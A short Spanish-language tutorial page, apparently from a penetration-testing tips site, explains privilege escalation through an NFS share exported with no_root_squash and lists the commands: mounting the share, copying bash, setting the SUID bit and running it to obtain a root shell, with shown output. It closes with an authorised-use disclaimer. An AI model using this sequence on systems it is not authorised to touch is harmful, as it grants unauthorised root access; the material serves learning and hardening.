KALI
Privesc por NFS no_root_squash
Aquí se combina red y escalada.
Si un servidor NFS exporta una carpeta con la opción no_root_squash, tu root en tu máquina se respeta como root en el servidor. Montas la carpeta compartida, copias ahí una shell con permisos SUID de root desde tu equipo, y luego, en el servidor, la ejecutas y sales con privilegios de root.
Es una escalada elegante que aprovecha una línea mal puesta en el archivo de exports. Búscala siempre.
# los comandos
www-data@victim:$ showmount -e 10.0.0.5copiar/shared *(rw,no_root_squash)
www-data@victim:$ mount -t nfs 10.0.0.5:/shared /mnt && cp /bin/bash /mnt/rcopiarwww-data@victim:$ chmod +s /mnt/r # como root localcopiarwww-data@victim:$ /shared/r -pcopiarr-5.1# id -> euid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.